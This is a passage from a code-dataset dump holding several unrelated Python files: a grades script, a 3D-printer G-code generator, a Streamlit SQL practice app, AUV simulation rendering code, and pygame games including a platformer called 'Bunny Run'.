192.168.19.31 -p 803 -d\n# To change output frequency:\n# python3 config_si570.py -a 192.168.19.31 -p 803 -d -f 185 -v\n","sub_path":"projects/test_marble_family/config_si570.py","file_name":"config_si570.py","file_ext":"py","file_size_in_byte":9926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"9252549","text":"def max_scores(gradesfile, maxscoresfile):\n \"\"\"\n Read exam scores (3 per student) from gradesfile and write the \n maximum total score and maximum exam score for each exam into \n maxscoresfile.\n\n gradesfile: name of file to be read\n maxscoresfile: name of file to be written\n \"\"\"\n gfile = open(gradesfile, 'r')\n sfile = open(maxscoresfile, 'w')\n\n # masterlist is a list of lists. 
Each element of the list contains\n # one line of the file, which is split into a list.\n\n masterlist = [line.split() for line in gfile]\n\n\n maxtotal = max([int(item[1]) + int(item[2]) + int(item[3]) for item in masterlist])\n maxexam1 = max([int(item[1]) for item in masterlist])\n maxexam2 = max([int(item[2]) for item in masterlist])\n maxexam3 = max([int(item[3]) for item in masterlist])\n \n sfile.write(\" Max total score: %5d\\n\"%(maxtotal))\n sfile.write(\"Max Exam 1 score: %5d\\n\"%(maxexam1))\n sfile.write(\"Max Exam 2 score: %5d\\n\"%(maxexam2))\n sfile.write(\"Max Exam 3 score: %5d\\n\"%(maxexam3))\n\n gfile.close()\n sfile.close()\n \n \n","sub_path":"OOP - Python/CODE notes/CODEnotes/jan30b.py","file_name":"jan30b.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"270501015","text":"import math\n\nclass Extruder:\n\n def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z\n self.gcode = []\n self.density = 0\n self.position_cache = (0,0,0)\n self.density_cache = 0\n\n ## Set the feedrate, mm/min\n def feedrate(self, f):\n cmd = \"G1 F\" + str(f)\n self.gcode.append(cmd)\n\n ## Do nothing for some milliseconds\n def dwell(self, ms):\n cmd = \"G04 P\" + str(ms)\n self.gcode.append(cmd)\n\n ## Extrude some plastic, mm\n def extrude(self, e):\n cmd = \"G1 E\" + str(e)\n self.gcode.append(cmd)\n\n ## Draw a line of plastic to (x, y, z)\n ## using the currently set density.\n def drawline(self, x, y, z=-1):\n if z < 0: z = self.z\n dist = ((x-self.x)**2+(y-self.y)**2+(z-self.z)**2)**(1/2)\n extrude = dist * self.density\n cmd = \"G1\"\n if x != self.x: cmd += \" X\" + str(x)\n if y != self.y: cmd += \" Y\" + str(y)\n if z != self.z: cmd += \" Z\" + str(z)\n if self.density != 0: cmd += \" E\" + str(extrude)\n self.gcode.append(cmd)\n self.x = x\n self.y = y\n self.z = z\n\n ## Set the density, mm/mm of extrusion\n def set_density(self, density):\n self.density = density\n\n ## Get the currently set density, mm/mm of extrusion\n def get_density(self):\n return self.density\n\n ## Store the current density in the cache\n def cache_density(self):\n self.density_cache = self.density\n\n ## Set the density to the currently cached density\n def reset_density(self):\n self.density = self.density_cache\n\n ## Store the current position in the cache\n def cache_position(self):\n self.position_cache = (self.x, self.y, self.z)\n\n ## Go to the position currently in the cache\n def reset_position(self):\n pc = self.position_cache\n self.x = pc[0]\n self.y = pc[1]\n self.z = pc[2]\n self.goto(*pc)\n\n ## Move to (x, y, z) without extruding\n def goto(self, x, y, z=0):\n self.cache_density()\n self.set_density(0)\n if z == 0:\n self.drawline(x, y)\n else:\n self.drawline(x, y, z)\n self.reset_density()\n\n ## Move to a given height without extruding\n def setz(self, z):\n self.cache_density()\n self.set_density(0)\n self.drawline(self.x, self.y, z)\n self.reset_density()\n\n ## Extrude a line to a certain position\n ## relative to the current position\n def drawdelta(self, dx, dy, dz=0):\n self.drawline(self.x + dx, self.y + dy, self.z + dz)\n\n ## Move without extruding to a certain position\n ## relative to the current position\n def move(self, dx, dy, dz=0):\n self.cache_density()\n self.set_density(0)\n self.drawdelta(dx, dy, dz)\n self.reset_density()\n\n ## Change the height by a certain amount without extruding\n def lift(self, dz):\n self.cache_density()\n self.set_density(0)\n 
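# with density forced to 0, drawdelta() emits a pure travel move (no E-axis word in the G-code)\n        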
self.drawdelta(0, 0, dz)\n        self.reset_density()\n\n    ## Run custom initialization commands\n    def initialize(self):\n        init_cmd = '\\n'.join([\n            \"G90\", ## Absolute coordinates\n            \"M83\", ## E-axis relative coords\n            \"G21\", ## Set units to mm\n            \"M104 S215\", ## Set hotend temp\n            \"M140 S60\", ## Set bed temp\n            \"M109 S215\", ## Wait for hotend to heat\n            \"M190 S60\", ## Wait for bed to heat\n            \"G28 W\", ## Go to home\n            \"G80\", ## Mesh bed leveling\n            \"G1 Y-3 F1000\", ## Go out of bounds\n            \"G1 X60 E9 F1000\", ## Draw test line\n            \"G1 X100 E12.5 F1000\", ## Draw test line\n            \"G92 E0\" ## Set E-axis to zero\n        ])\n        self.gcode.append(init_cmd)\n\n    ## Run custom finalization commands\n    def finalize(self):\n        final_cmd = '\\n'.join([\n            \"M104 S0\", ## Cool hotend\n            \"M140 S0\", ## Cool bed\n            \"M107\", ## Turn off fan\n            \"G1 Z200\", ## Move extruder upwards\n            \"M84\" ## Disable motors\n        ])\n        self.gcode.append(final_cmd)\n\n    ## Save extruder history to a GCODE file\n    ## WARNING: will overwrite files!\n    def save(self, filename):\n        with open(filename, 'w') as f:\n            for cmd in self.gcode:\n                f.write(cmd + \"\\n\")\n\n    ## Extrude a rectangle with a given length and width\n    def rectangle(self, x_len, y_len):\n        self.drawdelta(x_len, 0)\n        self.drawdelta(0, y_len)\n        self.drawdelta(-x_len, 0)\n        self.drawdelta(0, -y_len)\n\n    ## Extrude a regular polygon with a given radius and number of sides\n    ## centered at the current position\n    def circle(self, radius, n):\n        self.cache_position()\n        self.move(radius, 0)\n        # bug fix: the chord deltas must be scaled by the radius, otherwise a unit-size polygon is traced\n        x_diffs = [radius * (math.cos(2*math.pi*(k+1)/n) - math.cos(2*math.pi*k/n)) for k in range(n)]\n        y_diffs = [radius * (math.sin(2*math.pi*(k+1)/n) - math.sin(2*math.pi*k/n)) for k in range(n)]\n        for i in range(n):\n            x_diff = x_diffs[i]\n            y_diff = y_diffs[i]\n            self.drawdelta(x_diff, y_diff)\n        self.reset_position()\n\n    ## Extrude a spiral with a given length and width\n    ## which decrease by a distance delta with each iteration\n    def rect_spiral(self, x_len, y_len, delta, dwell=0):\n        x_move = x_len\n        y_move = y_len\n        sgn = 1\n        while x_move > 0 and y_move > 0:\n            self.drawdelta(sgn*x_move, 0)\n            self.drawdelta(0, sgn*y_move)\n            x_move += -delta\n            y_move += -delta\n            sgn = -sgn\n            self.dwell(dwell)\n","sub_path":"direct-gcode/from-scratch/Extruder.py","file_name":"Extruder.py","file_ext":"py","file_size_in_byte":6043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"159973096","text":"# SQL practice app\n\nimport pandas as pd\nimport streamlit as st\nimport sqlite3\nconn = sqlite3.connect(\"practice.db\")\nc = conn.cursor()\n\ndef table_init1():\n    # use IF EXISTS so the very first run (no table yet) does not raise an OperationalError\n    c.execute('drop table if exists 社員')\n    c.execute('CREATE TABLE IF NOT EXISTS 社員(社員コード text,氏名 text,性別 text,生年月日 date,部署 text, 入社年月日 date,上司コード text, PRIMARY KEY(社員コード))')\n    sql1 = 'insert into 社員(社員コード,氏名,性別,生年月日,部署,入社年月日,上司コード) values (?,?,?,?,?,?,?)'\n    data1 = [\n        ('001','山田','男','19820410','経理','20060401',\"\"), \n        ('002','山口', '女', '19860620','営業','20070401',\"\"), \n        ('003','江藤', '男', '19900810','情報システム','20070401',\"\"), \n        ('004','阿部', '女', '19830521','経理','20100401','001'), \n        ('005','矢野', '男', '20000131','情報システム','20200401','003'),\n        ('006','青木', '女', '19971203','営業','20200401','002')]\n    c.executemany(sql1, data1)\n    conn.commit()\n\ndef table_init2():\n    c.execute('drop table if exists 資格')\n    c.execute('CREATE TABLE IF NOT EXISTS 資格(社員コード text,保有資格 text,取得日 date,PRIMARY KEY(社員コード,保有資格))')\n    sql2 = 'insert into 資格(社員コード,保有資格,取得日) values (?,?,?)'\n    data2 = [\n        ('001','簿記3級', '20140610'), \n        ('001','簿記2級', '20150610'), \n        ('002','簿記3級', '20150610'), \n        
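# note: 社員 003 and 006 get no rows in this table, which makes them handy for practicing LEFT OUTER JOIN\n        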
('004','簿記3級', '20201110'), \n ('005','簿記3級', '20181110'), \n ('005','基本情報技術者', '20190420')]\n c.executemany(sql2, data2)\n conn.commit()\n\ndef exsql(sql):\n if \"SELECT\" in sql.upper():\n c.execute(sql)\n data=c.fetchall()\n return data\n else:\n c.execute(sql)\n conn.commit()\n return pd.DataFrame()\n\ndef view_all(table):\n c.execute('select * from \"{}\" '.format(table))\n data=c.fetchall()\n data=pd.DataFrame(data)\n return data\n\ncol1,col2=st.beta_columns(2)\n\nwith col1:\n button_init = st.button(\"テーブルを初期値にする\")\n sql=st.text_area(\"SQLを入力\",max_chars=1000,height=200)\n button_exec = st.button(\"SQLを実行する\")\n\n if button_exec:\n return_data=exsql(sql)\n st.write(\"実行結果\")\n st.table(return_data)\n\nwith col2:\n\n if button_init:\n table_init1()\n table_init2()\n\n shainn = view_all(\"社員\")\n colname1 = {0:\"社員コード\",1:\"氏名\",2:\"性別\",3:\"生年月日\",4:\"部署\",5:\"入社年月日\",6:\"上司コード\"}\n shainn = shainn.rename(columns=colname1)\n st.write(\"社員テーブル\")\n st.table(shainn)\n\n shikaku = view_all(\"資格\")\n colname2 = {0:\"社員コード\",1:\"保有資格\",2:\"取得日\"}\n shikaku = shikaku.rename(columns=colname2)\n st.write(\"資格テーブル\")\n st.table(shikaku)","sub_path":"sql_practice.py","file_name":"sql_practice.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"579402759","text":"import pygame\nimport numpy as np\n\nfrom typing import List\nfrom gym_auv.render2d.geometry import (\n Circle,\n FilledPolygon,\n BaseGeom,\n Line,\n PolyLine,\n)\nfrom gym_auv.render2d.state import RenderableState\nfrom gym_auv.render2d.utils import clamp_to_uint8\nfrom gym_auv.objects.obstacles import (\n BaseObstacle,\n CircularObstacle,\n PolygonObstacle,\n VesselObstacle,\n)\nfrom gym_auv.objects.vessel import Vessel\nfrom gym_auv.objects.path import Path\nfrom gym_auv.render2d import colors\nfrom gym_auv.render2d.utils import ndarray_to_vector2_list\n\n\ndef _render_path(path: Path) -> PolyLine:\n points = ndarray_to_vector2_list(path.points)\n polyline = PolyLine(points, color=colors.LIGHT_GREEN)\n\n return polyline\n\n\ndef _render_path_taken(vessel: Vessel) -> PolyLine:\n # previous positions\n points = ndarray_to_vector2_list(vessel.path_taken)\n path_taken_line = PolyLine(\n points=points,\n color=colors.BLUE_GREEN,\n )\n\n return path_taken_line\n\n\ndef _render_vessel(vessel: Vessel) -> FilledPolygon:\n vertices = [\n pygame.Vector2(-vessel.width / 2, -vessel.width / 2),\n pygame.Vector2(-vessel.width / 2, vessel.width / 2),\n pygame.Vector2(vessel.width / 2, vessel.width / 2),\n pygame.Vector2(3 / 2 * vessel.width, 0),\n pygame.Vector2(vessel.width / 2, -vessel.width / 2),\n ]\n\n vessel_shape = FilledPolygon(vertices, color=colors.ORANGE)\n\n return vessel_shape\n\n\ndef _render_sensors(vessel: Vessel) -> List[BaseGeom]:\n sensor_lines: List[BaseGeom] = []\n for isensor, sensor_angle in enumerate(vessel._sensor_angles):\n distance = vessel._last_sensor_dist_measurements[isensor]\n p0 = pygame.Vector2(0, 0)\n p1 = (\n pygame.Vector2(\n np.cos(sensor_angle),\n np.sin(sensor_angle),\n )\n * distance\n )\n\n # closeness = vessel._last_sector_dist_measurements[isector]\n closeness = vessel._last_sensor_dist_measurements[isensor]\n redness = clamp_to_uint8(int(0.5 + 0.5 * max(0, closeness) * 255))\n greenness = clamp_to_uint8(int((1 - max(0, closeness)) * 255))\n blueness = 255\n alpha = 127\n color = pygame.Color(redness, greenness, blueness, alpha)\n sensor_lines.append(Line(start=p0, end=p1, color=color))\n\n return 
sensor_lines\n\n\ndef _render_progress(path: Path, vessel: Vessel) -> List[BaseGeom]:\n    geoms = []\n    ref_point = pygame.Vector2(\n        *path(vessel._last_navi_state_dict[\"vessel_arclength\"]).flatten()\n    )\n    geoms.append(Circle(center=ref_point, radius=1, color=colors.EGG_WHITE))\n\n    target_point = pygame.Vector2(\n        *path(vessel._last_navi_state_dict[\"target_arclength\"]).flatten()\n    )\n    geoms.append(Circle(center=target_point, radius=1, color=colors.EGG_WHITE))\n\n    return geoms\n\n\ndef _render_obstacles(obstacles: List[BaseObstacle]) -> List[BaseGeom]:\n    geoms = []\n    for obst in obstacles:\n        c = colors.EGG_WHITE\n\n        if isinstance(obst, CircularObstacle):\n            geoms.append(Circle(pygame.Vector2(*obst.position), obst.radius, color=c))\n\n        elif isinstance(obst, PolygonObstacle):\n            points = ndarray_to_vector2_list(obst.points)\n            # bug fix: points is already a list of Vector2s (see _render_path); wrapping it in pygame.Vector2 would raise\n            geoms.append(PolyLine(points, color=c))\n\n        elif isinstance(obst, VesselObstacle):\n            points = ndarray_to_vector2_list(obst.boundary.exterior.coords)\n            geoms.append(FilledPolygon(points, color=c))\n\n    return geoms\n\n\ndef make_world_frame_geoms(state: RenderableState) -> List[BaseGeom]:\n    geoms = []\n\n    if state.path is not None:\n        geoms.append(_render_path(path=state.path))\n    geoms.append(_render_path_taken(vessel=state.vessel))\n    geoms.extend(_render_obstacles(obstacles=state.obstacles))\n    if state.path is not None:\n        geoms.extend(_render_progress(path=state.path, vessel=state.vessel))\n\n    return geoms\n\n\ndef make_body_frame_geoms(state: RenderableState) -> List[BaseGeom]:\n    geoms = []\n    geoms.append(_render_vessel(vessel=state.vessel))\n    geoms.extend(_render_sensors(vessel=state.vessel))\n\n    return geoms\n","sub_path":"gym_auv/render2d/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"63445982","text":"# Import pygame library\r\nimport pygame\r\n\r\n# Initialize pygame\r\npygame.init()\r\n\r\n# Create the game window/screen\r\nscreen = pygame.display.set_mode((400,600))\r\n\r\n# Create a rectangle for paddle object\r\npaddle = pygame.Rect(200,500,30,10)\r\n\r\n# Create a rectangle for ball object\r\nball = pygame.Rect(70,50,10,10)\r\n\r\n# Game loop\r\nwhile True: \r\n    for event in pygame.event.get():\r\n        if event.type == pygame.QUIT:\r\n            pygame.quit()\r\n            raise SystemExit  # bug fix: leave the loop; drawing below after pygame.quit() would raise an error\r\n    \r\n    # Draw blue colored paddle on screen\r\n    pygame.draw.rect(screen,(23,100,100),paddle)\r\n    \r\n    # Draw a white colored ball on screen\r\n    pygame.draw.rect(screen,(255,255,255),ball)\r\n    \r\n    # Update the display with paddle and ball objects\r\n    pygame.display.update()\r\n","sub_path":"SA1_solution.py","file_name":"SA1_solution.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"125661559","text":"#!/usr/bin/env python3\r\n\r\nimport json\r\nimport pygame\r\nimport sys\r\nimport time\r\n\r\npygame.mixer.pre_init()\r\npygame.init()\r\n\r\n# Window settings\r\nTITLE = \"Bunny Run\"\r\nWIDTH = 1280\r\nHEIGHT = 640\r\nFPS = 60\r\nGRID_SIZE = 64\r\n\r\n# Options\r\nsound_on = True\r\n\r\n# Controls\r\nLEFT = pygame.K_LEFT\r\nRIGHT = pygame.K_RIGHT\r\nJUMP = pygame.K_SPACE\r\n\r\n# Levels\r\nlevels = [\"levels/world-1.json\",\r\n          \"levels/world-2.json\",\r\n          \"levels/world-3.json\",\r\n          \"levels/world-4.json\"]\r\n\r\n# Colors\r\nTRANSPARENT = (0, 0, 0, 0)\r\nDARK_BLUE = (16, 86, 103)\r\nWHITE = (255, 255, 255)\r\nBLACK = (0, 0, 0)\r\nPURPLE = (197, 122, 255)\r\n\r\n# 
Fonts\r\nBubblegum_Font = pygame.font.Font(\"assets/fonts/Bubblegum.ttf\", 32)\r\nChocolate_Bar_Font = pygame.font.Font(\"assets/fonts/Chocolate Bar.otf\", 72)\r\n\r\n# Helper functions\r\ndef load_image(file_path):\r\n img = pygame.image.load(file_path)\r\n img = pygame.transform.scale(img, (GRID_SIZE, GRID_SIZE))\r\n\r\n return img\r\n\r\ndef play_sound(sound, loops=0, maxtime=0, fade_ms=0):\r\n if sound_on:\r\n if maxtime == 0:\r\n sound.play(loops, maxtime, fade_ms)\r\n else:\r\n sound.play(loops, maxtime, fade_ms)\r\n\r\ndef play_music():\r\n if sound_on:\r\n pygame.mixer.music.play(-1)\r\n\r\n# Images\r\nbunny_walk1 = load_image(\"assets/Players/bunny2_walk1.png\")\r\nbunny_walk2 = load_image(\"assets/Players/bunny2_walk2.png\")\r\nbunny_jump = load_image(\"assets/Players/bunny2_jump.png\")\r\nbunny_idle = load_image(\"assets/Players/bunny2_stand.png\")\r\nbunny_images = {\"run\": [bunny_walk1, bunny_walk2],\r\n \"jump\": bunny_jump,\r\n \"idle\": bunny_idle}\r\n\r\nblock_images = {\"G\": load_image(\"assets/Environment/ground_grass.png\"),\r\n \"GB\": load_image(\"assets/Environment/ground_grass_broken.png\"),\r\n \"GS\": load_image(\"assets/Environment/ground_grass_small.png\"),\r\n \"GSB\": load_image(\"assets/Environment/ground_grass_small_broken.png\"),\r\n \"C\": load_image(\"assets/Environment/ground_cake.png\"),\r\n \"CB\": load_image(\"assets/Environment/ground_cake_broken.png\"),\r\n \"CS\": load_image(\"assets/Environment/ground_cake_small.png\"),\r\n \"CSB\": load_image(\"assets/Environment/ground_cake_small_broken.png\"),\r\n \"S\": load_image(\"assets/Environment/ground_sand.png\"),\r\n \"SB\": load_image(\"assets/Environment/ground_sand_broken.png\"),\r\n \"SS\": load_image(\"assets/Environment/ground_sand_small.png\"),\r\n \"SSB\": load_image(\"assets/Environment/ground_sand_small_broken.png\"),\r\n \"SN\": load_image(\"assets/Environment/ground_snow.png\"),\r\n \"SNB\": load_image(\"assets/Environment/ground_snow_broken.png\"),\r\n \"SNS\": load_image(\"assets/Environment/ground_snow_small.png\"),\r\n \"SNSB\": load_image(\"assets/Environment/ground_snow_small_broken.png\"),\r\n \"ST\": load_image(\"assets/Environment/ground_stone.png\"),\r\n \"STB\": load_image(\"assets/Environment/ground_stone_broken.png\"),\r\n \"STS\": load_image(\"assets/Environment/ground_stone_small.png\"),\r\n \"STSB\": load_image(\"assets/Environment/ground_stone_small_broken.png\"),\r\n \"W\": load_image(\"assets/Environment/ground_wood.png\"),\r\n \"WB\": load_image(\"assets/Environment/ground_wood_broken.png\"),\r\n \"WS\": load_image(\"assets/Environment/ground_wood_small.png\"),\r\n \"WSB\": load_image(\"assets/Environment/ground_wood_small_broken.png\")}\r\n\r\ncoin_img = load_image(\"assets/Items/gold_1.png\")\r\npowerup_img = load_image(\"assets/Items/powerup_bunny.png\")\r\ncarrot_img = load_image(\"assets/Items/carrot.png\")\r\nportal_img = load_image(\"assets/Items/portal_yellow.png\")\r\ngold_carrot_img = load_image(\"assets/Items/carrot_gold.png\")\r\nbubble_img = load_image(\"assets/Items/bubble.png\")\r\nbolt_img = load_image(\"assets/Particles/lighting_blue.png\")\r\njetpack_img = load_image(\"assets/Items/jetpack.png\")\r\n\r\nspikeball_img1 = load_image(\"assets/Enemies/spikeBall1.png\")\r\nspikeball_img2 = load_image(\"assets/Enemies/spikeBall2.png\")\r\nspikeball_images = [spikeball_img1, spikeball_img2]\r\n\r\nspikeman_img = load_image(\"assets/Enemies/spikeMan_stand.png\")\r\nspikeman_walk1 = load_image(\"assets/Enemies/spikeMan_walk1.png\")\r\nspikeman_walk2 = 
load_image(\"assets/Enemies/spikeMan_walk2.png\")\r\nspikeman_images = [spikeman_walk1, spikeman_walk2]\r\n\r\nflyman_img1 = load_image(\"assets/Enemies/flyMan_stand.png\")\r\nflyman_img2 = load_image(\"assets/Enemies/flyMan_fly.png\")\r\nflyman_images = [flyman_img1, flyman_img2]\r\n\r\n# Sounds\r\nJUMP_SOUND = pygame.mixer.Sound(\"assets/sounds/jump.wav\")\r\nCOIN_SOUND = pygame.mixer.Sound(\"assets/sounds/pickup_coin.wav\")\r\nPOWERUP_SOUND = pygame.mixer.Sound(\"assets/sounds/powerup.wav\")\r\nHURT_SOUND = pygame.mixer.Sound(\"assets/sounds/hurt.ogg\")\r\nDIE_SOUND = pygame.mixer.Sound(\"assets/sounds/death.wav\")\r\nLEVELUP_SOUND = pygame.mixer.Sound(\"assets/sounds/level_up.wav\")\r\nGAMEOVER_SOUND = pygame.mixer.Sound(\"assets/sounds/game_over.wav\")\r\n\r\nclass Entity(pygame.sprite.Sprite):\r\n\r\n def __init__(self, x, y, image):\r\n super().__init__()\r\n\r\n self.image = image\r\n self.rect = self.image.get_rect()\r\n self.rect.x = x\r\n self.rect.y = y\r\n\r\n self.vy = 0\r\n self.vx = 0\r\n\r\n def apply_gravity(self, level):\r\n self.vy += level.gravity\r\n self.vy = min(self.vy, level.terminal_velocity)\r\n\r\nclass Block(Entity):\r\n\r\n def __init__(self, x, y, image):\r\n super().__init__(x, y, image)\r\n\r\nclass Character(Entity):\r\n\r\n def __init__(self, images):\r\n super().__init__(0, 0, images['idle'])\r\n\r\n self.image_idle = images['idle']\r\n self.images_run_right = images['run']\r\n self.images_run_left = [pygame.transform.flip(img, 1, 0) for img in self.images_run_right]\r\n self.image_jump_right = images['jump']\r\n self.image_jump_left = pygame.transform.flip(self.image_jump_right, 1, 0)\r\n\r\n self.running_images = self.images_run_right\r\n self.image_index = 0\r\n self.steps = 0\r\n\r\n self.speed = 5\r\n self.jump_power = 20\r\n\r\n self.vx = 0\r\n self.vy = 0\r\n self.facing_right = True\r\n self.on_ground = True\r\n self.jetpack_on = False\r\n\r\n self.score = 0\r\n self.lives = 3\r\n self.hearts = 3\r\n self.max_hearts = 3\r\n self.invincibility = 0\r\n self.jetpack_time = 0\r\n self.coins = 0\r\n\r\n def move_left(self):\r\n self.vx = -self.speed\r\n self.facing_right = False\r\n\r\n def move_right(self):\r\n self.vx = self.speed\r\n self.facing_right = True\r\n\r\n def stop(self):\r\n self.vx = 0\r\n\r\n def jump(self, blocks):\r\n self.rect.y += 1\r\n\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n if len(hit_list) > 0:\r\n self.vy = -1 * self.jump_power\r\n play_sound(JUMP_SOUND)\r\n\r\n self.rect.y -= 1\r\n\r\n def check_world_boundaries(self, level):\r\n if self.rect.left < 0:\r\n self.rect.left = 0\r\n elif self.rect.right > level.width:\r\n self.rect.right = level.width\r\n\r\n def move_and_process_blocks(self, blocks):\r\n self.rect.x += self.vx\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n for block in hit_list:\r\n if self.vx > 0:\r\n self.rect.right = block.rect.left\r\n self.vx = 0\r\n elif self.vx < 0:\r\n self.rect.left = block.rect.right\r\n self.vx = 0\r\n\r\n self.on_ground = False\r\n self.rect.y += self.vy\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n for block in hit_list:\r\n if self.vy > 0:\r\n self.rect.bottom = block.rect.top\r\n self.vy = 0\r\n self.on_ground = True\r\n elif self.vy < 0:\r\n self.rect.top = block.rect.bottom\r\n self.vy = 0\r\n\r\n def process_coins(self, coins):\r\n hit_list = pygame.sprite.spritecollide(self, coins, True)\r\n\r\n for coin in hit_list:\r\n play_sound(COIN_SOUND)\r\n self.score += coin.value\r\n self.coins += 1\r\n 
if self.coins == 10:\r\n self.lives += 1\r\n self.coins = 0\r\n\r\n def process_enemies(self, enemies):\r\n hit_list = pygame.sprite.spritecollide(self, enemies, False)\r\n\r\n if len(hit_list) > 0 and self.invincibility == 0:\r\n play_sound(HURT_SOUND)\r\n self.hearts -= 1\r\n self.invincibility = int(0.75 * FPS)\r\n\r\n def process_powerups(self, powerups):\r\n hit_list = pygame.sprite.spritecollide(self, powerups, True)\r\n\r\n for p in hit_list:\r\n play_sound(POWERUP_SOUND)\r\n p.apply(self)\r\n\r\n def check_flag(self, level):\r\n hit_list = pygame.sprite.spritecollide(self, level.flag, False)\r\n\r\n if len(hit_list) > 0:\r\n level.completed = True\r\n play_sound(LEVELUP_SOUND)\r\n\r\n def set_image(self):\r\n if self.on_ground:\r\n if self.vx != 0:\r\n if self.facing_right:\r\n self.running_images = self.images_run_right\r\n else:\r\n self.running_images = self.images_run_left\r\n\r\n self.steps = (self.steps + 1) % self.speed # Works well with 2 images, try lower number if more frames are in animation\r\n\r\n if self.steps == 0:\r\n self.image_index = (self.image_index + 1) % len(self.running_images)\r\n self.image = self.running_images[self.image_index]\r\n else:\r\n self.image = self.image_idle\r\n else:\r\n if self.facing_right:\r\n self.image = self.image_jump_right\r\n else:\r\n self.image = self.image_jump_left\r\n\r\n def die(self):\r\n self.lives -= 1\r\n\r\n if self.lives > 0:\r\n play_sound(DIE_SOUND)\r\n else:\r\n play_sound(GAMEOVER_SOUND)\r\n\r\n def respawn(self, level):\r\n self.rect.x = level.start_x\r\n self.rect.y = level.start_y\r\n self.hearts = self.max_hearts\r\n self.invincibility = 0\r\n\r\n def calculate_jetpack_time(self):\r\n if self.jetpack_time <= 0:\r\n self.jetpack_on = False\r\n else:\r\n self.jetpack_time -= 1\r\n\r\n def update(self, level):\r\n self.process_enemies(level.enemies)\r\n if self.jetpack_on == True:\r\n pass\r\n else:\r\n self.apply_gravity(level)\r\n self.move_and_process_blocks(level.blocks)\r\n self.check_world_boundaries(level)\r\n self.set_image()\r\n\r\n if self.hearts > 0:\r\n self.process_coins(level.coins)\r\n self.process_powerups(level.powerups)\r\n self.check_flag(level)\r\n\r\n if self.invincibility > 0:\r\n self.invincibility -= 1\r\n else:\r\n self.die()\r\n\r\nclass Coin(Entity):\r\n def __init__(self, x, y, image):\r\n super().__init__(x, y, image)\r\n\r\n self.value = 10\r\n\r\nclass Enemy(Entity):\r\n def __init__(self, x, y, images):\r\n super().__init__(x, y, images[0])\r\n\r\n self.images_right = images\r\n self.images_left = [pygame.transform.flip(img, 1, 0) for img in images]\r\n self.current_images = self.images_left\r\n self.image_index = 0\r\n self.steps = 0\r\n\r\n def reverse(self):\r\n self.vx *= -1\r\n\r\n if self.vx < 0:\r\n self.current_images = self.images_left\r\n else:\r\n self.current_images = self.images_right\r\n\r\n self.image = self.current_images[self.image_index]\r\n\r\n def check_world_boundaries(self, level):\r\n if self.rect.left < 0:\r\n self.rect.left = 0\r\n self.reverse()\r\n elif self.rect.right > level.width:\r\n self.rect.right = level.width\r\n self.reverse()\r\n\r\n def move_and_process_blocks(self):\r\n pass\r\n\r\n def set_images(self):\r\n if self.steps == 0:\r\n self.image = self.current_images[self.image_index]\r\n self.image_index = (self.image_index + 1) % len(self.current_images)\r\n\r\n self.steps = (self.steps + 1) % 20 # Nothing significant about 20. 
It just seems to work okay.\r\n\r\n def is_near(self, hero):\r\n return abs(self.rect.x - hero.rect.x) < 2 * WIDTH\r\n\r\n\r\n def reset(self):\r\n self.rect.x = self.start_x\r\n self.rect.y = self.start_y\r\n self.vx = self.start_vx\r\n self.vy = self.start_vy\r\n self.image = self.images_left[0]\r\n self.steps = 0\r\n\r\nclass Bear(Enemy):\r\n def __init__(self, x, y, images):\r\n super().__init__(x, y, images)\r\n\r\n self.start_x = x\r\n self.start_y = y\r\n self.start_vx = -2\r\n self.start_vy = 0\r\n\r\n self.vx = self.start_vx\r\n self.vy = self.start_vy\r\n\r\n def move_and_process_blocks(self, blocks):\r\n self.rect.x += self.vx\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n for block in hit_list:\r\n if self.vx > 0:\r\n self.rect.right = block.rect.left\r\n self.reverse()\r\n elif self.vx < 0:\r\n self.rect.left = block.rect.right\r\n self.reverse()\r\n\r\n self.rect.y += self.vy\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n for block in hit_list:\r\n if self.vy > 0:\r\n self.rect.bottom = block.rect.top\r\n self.vy = 0\r\n elif self.vy < 0:\r\n self.rect.top = block.rect.bottom\r\n self.vy = 0\r\n\r\n def update(self, level, hero):\r\n if self.is_near(hero):\r\n self.apply_gravity(level)\r\n self.move_and_process_blocks(level.blocks)\r\n self.check_world_boundaries(level)\r\n self.set_images()\r\n\r\nclass Monster(Enemy):\r\n def __init__(self, x, y, images):\r\n super().__init__(x, y, images)\r\n\r\n self.start_x = x\r\n self.start_y = y\r\n self.start_vx = -2\r\n self.start_vy = 0\r\n\r\n self.vx = self.start_vx\r\n self.vy = self.start_vy\r\n\r\n def move_and_process_blocks(self, blocks):\r\n reverse = False\r\n\r\n self.rect.x += self.vx\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n for block in hit_list:\r\n if self.vx > 0:\r\n self.rect.right = block.rect.left\r\n self.reverse()\r\n elif self.vx < 0:\r\n self.rect.left = block.rect.right\r\n self.reverse()\r\n\r\n self.rect.y += self.vy\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n reverse = True\r\n\r\n for block in hit_list:\r\n if self.vy >= 0:\r\n self.rect.bottom = block.rect.top\r\n self.vy = 0\r\n\r\n if self.vx > 0 and self.rect.right <= block.rect.right:\r\n reverse = False\r\n\r\n elif self.vx < 0 and self.rect.left >= block.rect.left:\r\n reverse = False\r\n\r\n elif self.vy < 0:\r\n self.rect.top = block.rect.bottom\r\n self.vy = 0\r\n\r\n if reverse:\r\n self.reverse()\r\n\r\n def update(self, level, hero):\r\n if self.is_near(hero):\r\n self.apply_gravity(level)\r\n 